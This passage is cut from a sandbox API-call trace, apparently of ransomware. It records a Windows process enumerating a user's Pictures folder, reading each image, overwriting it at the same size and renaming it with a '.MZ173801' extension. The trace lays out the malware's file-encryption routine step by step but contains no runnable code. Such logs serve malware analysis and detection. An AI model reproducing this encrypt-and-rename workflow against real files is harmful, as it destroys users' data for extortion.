JDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.188] GetCurrentThreadId () returned 0x1358 [0116.188] GetCurrentThreadId () returned 0x1358 [0116.188] GetCurrentThreadId () returned 0x1358 [0116.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.189] GetCurrentThreadId () returned 0x1358 [0116.189] GetCurrentThreadId () returned 0x1358 [0116.189] GetCurrentThreadId () returned 0x1358 [0116.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XO1z23.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xo1z23.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.189] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.189] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.189] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x15f93 [0116.189] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.189] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x15f93, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x15f93, lpOverlapped=0x0) returned 1 [0116.190] CloseHandle (hObject=0x3d0) returned 1 [0116.200] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XO1z23.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xo1z23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.201] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x15f93, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x15f93, lpOverlapped=0x0) returned 1 [0116.203] CloseHandle (hObject=0x3d0) returned 1 [0116.206] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XO1z23.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xo1z23.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XO1z23.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xo1z23.bmp.mz173801")) returned 1 [0116.207] GetCurrentThreadId () returned 0x1358 [0116.207] GetCurrentThreadId () returned 0x1358 [0116.207] GetCurrentThreadId () returned 0x1358 [0116.207] GetCurrentThreadId () returned 0x1358 [0116.207] GetCurrentThreadId () returned 0x1358 [0116.207] GetCurrentThreadId () returned 0x1358 [0116.207] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaef750, ftCreationTime.dwHighDateTime=0x1d5ecf6, ftLastAccessTime.dwLowDateTime=0x60901260, ftLastAccessTime.dwHighDateTime=0x1d5ed32, ftLastWriteTime.dwLowDateTime=0x60901260, ftLastWriteTime.dwHighDateTime=0x1d5ed32, nFileSizeHigh=0x0, nFileSizeLow=0x5e4d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="zY_vL.gif", cAlternateFileName="")) returned 1 [0116.207] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.207] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.207] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\zY_vL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\zy_vl.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaef750, ftCreationTime.dwHighDateTime=0x1d5ecf6, ftLastAccessTime.dwLowDateTime=0x60901260, ftLastAccessTime.dwHighDateTime=0x1d5ed32, ftLastWriteTime.dwLowDateTime=0x60901260, ftLastWriteTime.dwHighDateTime=0x1d5ed32, nFileSizeHigh=0x0, nFileSizeLow=0x5e4d)) returned 1 [0116.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.208] GetCurrentThreadId () returned 0x1358 [0116.208] GetCurrentThreadId () returned 0x1358 [0116.209] GetCurrentThreadId () returned 0x1358 [0116.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.209] GetCurrentThreadId () returned 0x1358 [0116.210] GetCurrentThreadId () returned 0x1358 [0116.210] GetCurrentThreadId () returned 0x1358 [0116.210] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\zY_vL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\zy_vl.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.210] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.210] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.210] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x5e4d [0116.210] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.210] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x5e4d, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x5e4d, lpOverlapped=0x0) returned 1 [0116.211] CloseHandle (hObject=0x3d0) returned 1 [0116.212] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\zY_vL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\zy_vl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.213] WriteFile (in: hFile=0x3d0, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x5e4d, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f6f0*=0x5e4d, lpOverlapped=0x0) returned 1 [0116.281] CloseHandle (hObject=0x3d0) returned 1 [0116.337] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\zY_vL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\zy_vl.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\zY_vL.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\zy_vl.gif.mz173801")) returned 1 [0116.338] GetCurrentThreadId () returned 0x1358 [0116.338] GetCurrentThreadId () returned 0x1358 [0116.338] GetCurrentThreadId () returned 0x1358 [0116.338] GetCurrentThreadId () returned 0x1358 [0116.338] GetCurrentThreadId () returned 0x1358 [0116.338] GetCurrentThreadId () returned 0x1358 [0116.338] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaef750, ftCreationTime.dwHighDateTime=0x1d5ecf6, ftLastAccessTime.dwLowDateTime=0x60901260, ftLastAccessTime.dwHighDateTime=0x1d5ed32, ftLastWriteTime.dwLowDateTime=0x60901260, ftLastWriteTime.dwHighDateTime=0x1d5ed32, nFileSizeHigh=0x0, nFileSizeLow=0x5e4d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="zY_vL.gif", cAlternateFileName="")) returned 0 [0116.338] GetLastError () returned 0x12 [0116.338] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0116.338] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96957a40, ftCreationTime.dwHighDateTime=0x1d5ef48, ftLastAccessTime.dwLowDateTime=0xa69e47a2, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa69e47a2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bd58 [0116.338] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0116.338] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.338] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96957a40, ftCreationTime.dwHighDateTime=0x1d5ef48, ftLastAccessTime.dwLowDateTime=0xa69e47a2, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa69e47a2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0116.338] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.338] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.338] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef488e30, ftCreationTime.dwHighDateTime=0x1d5ed94, ftLastAccessTime.dwLowDateTime=0xcc9dfd00, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0xa5d18ffb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1687d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="2ffpB.gif.MZ173801", cAlternateFileName="2FFPBG~1.MZ1")) returned 1 [0116.338] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.338] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.338] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32adfff0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x5c232130, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0xa5f552d2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x123a5, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="3JY_fq-iYjeZZ.bmp.MZ173801", cAlternateFileName="3JY_FQ~1.MZ1")) returned 1 [0116.338] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.338] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: 